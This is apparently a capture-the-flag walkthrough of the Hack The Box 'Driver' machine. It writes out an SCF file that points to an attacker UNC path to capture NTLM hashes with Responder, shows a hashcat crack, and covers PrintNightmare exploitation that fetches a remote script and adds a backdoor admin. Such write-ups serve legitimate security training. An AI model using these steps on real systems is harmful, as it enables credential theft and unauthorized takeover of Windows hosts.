Challenge description
https://app.hackthebox.com/machines/Driver
This VM is an easy Windows machine
Reconnaissance / Enumeration
Port scanning and service identification
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
$ rustscan -a $ip -r 1,65535 -- -A -sC
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc syn-ack Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-01-17T02:16:50
|_ start_date: 2022-01-16T20:40:33
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 25778/tcp): CLEAN (Timeout)
| Check 2 (port 18115/tcp): CLEAN (Timeout)
| Check 3 (port 26928/udp): CLEAN (Timeout)
| Check 4 (port 15033/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s
SMB Enumeration
All tools I used reported no open share
Web Enumeration
Browsing to http://driver.htb gets us to a basic authentication login prompt. After trying a couple usual default password, I manage to log in with admin/admin.
After logging in, we get to what looks like a printer admin page.
On the “Firmware Updates” tab, we can upload a file and the page says :
Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.
It’s a pretty clear indication that “someone” or “something” will check the file we upload.
After trying some upload tricks, well, no tricks are needed. There are no restriction what so ever.
Exploitation && Foothold
Let’s read this again:
Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.
It says that our uploaded file will be placed on their file share which implies that someone will browse the share.
Let’s do a SCF file attack
Per Pentestlab.blog:
However a SCF file can be used to access a specific UNC path which allows the penetration tester to build an attack. The code below can be placed inside a text file which then needs to be planted into a network share.
When the user will browse the share a connection will established automatically from his system to the UNC path that is contained inside the SCF file. Windows will try to authenticate to that share with the username and the password of the user. During that authentication process a random 8 byte challenge key is sent from the server to the client and the hashed NTLM/LANMAN password is encrypted again with this challenge key. Responder will capture the NTLMv2 hash.
1
2
3
4
5
6
7
$ cat << EOF > exploit.scf
[Shell]
Command=2
IconFile=\\10.10.14.74\share\exploit.ico
[Taskbar]
Command=ToggleDesktop
EOF
We can now upload our exploit using the firmware update page and wait for responder to capture hashes:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ sudo responder -w --lm -v -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.1.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[...]
[SMB] NTLMv2 Client : ::ffff:10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash : tony::DRIVER:90915e30a4d61b55:EFD5982FC730F2132B289A758EF1AB26:010100000000000017D7481F870BD801DADD4A94693D22FF00000000020000000000000000000000
[...]
Now, let’s crack it and use the password to log on the target:
1
2
3
4
5
6
7
8
9
10
11
$ hashcat -a 0 -m 5600 hashes /opt/wordlists/rockyou.txt
hashcat (v6.2.5) starting
[...]
TONY::DRIVER:a4a1daba2e76ad05:597b6b92e2114645d6f9cf39f3a315ff:01010000000000007212b4fe870bd8011aa3e96919e9f60000000000020000000000000000000000:liltony
[...]
$ evil-winrm -i $ip -u tony -p liltony -s /tmp/driver
*Evil-WinRM* PS C:\Users\tony\Documents> more c:\users\tony\desktop\user.txt
(redacted)
Privilege Escalation
To escalate our privileges to administrator, we’ll be exploiting a recently discovered vulnerability affecting the Windows print spooler.
First, download the exploit and open a winrm session using Evil-Winrm using the -s option to load the folder containing the exploit.
The exploit script will allow us to create a new admin local user.
1
2
3
4
5
6
7
$ wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1 -O /tmp/driver/CVE-2021-1675.ps1
2022-01-17 08:55:58 (7.46 MB/s) - ‘CVE-2021-1675.ps1’ saved [178561/178561]
$ evil-winrm -i $ip -u tony -p liltony -s /tmp/driver
*Evil-WinRM* PS C:\Users\tony\Documents>
When Evil-Winrm is opened with the -s (–scripts) option, all the scripts inside the folder becomes directly accessible within the winrm session. Let’s load and run the exploit to create our backdoor user.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
*Evil-WinRM* PS C:\Users\tony\Documents> CVE-2021-1675.ps1
*Evil-WinRM* PS C:\Users\tony\Documents> invoke-nightmare -newuser h3x -newpass h3xp4ss!
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user h3x as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
*Evil-WinRM* PS C:\Users\tony\Documents> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
h3x
The command completed successfully.
*Evil-WinRM* PS C:\Users\tony\Documents> exit
Now let’s use our new user to get admin privileges.
1
2
3
4
5
6
$ evil-winrm -i $ip -u h3x -p h3xp4ss!
Evil-WinRM shell v3.3
*Evil-WinRM* PS C:\Users\h3x\Documents> more c:\users\administrator\desktop\root.txt
(redacted)
Thanks for reading <3
h3x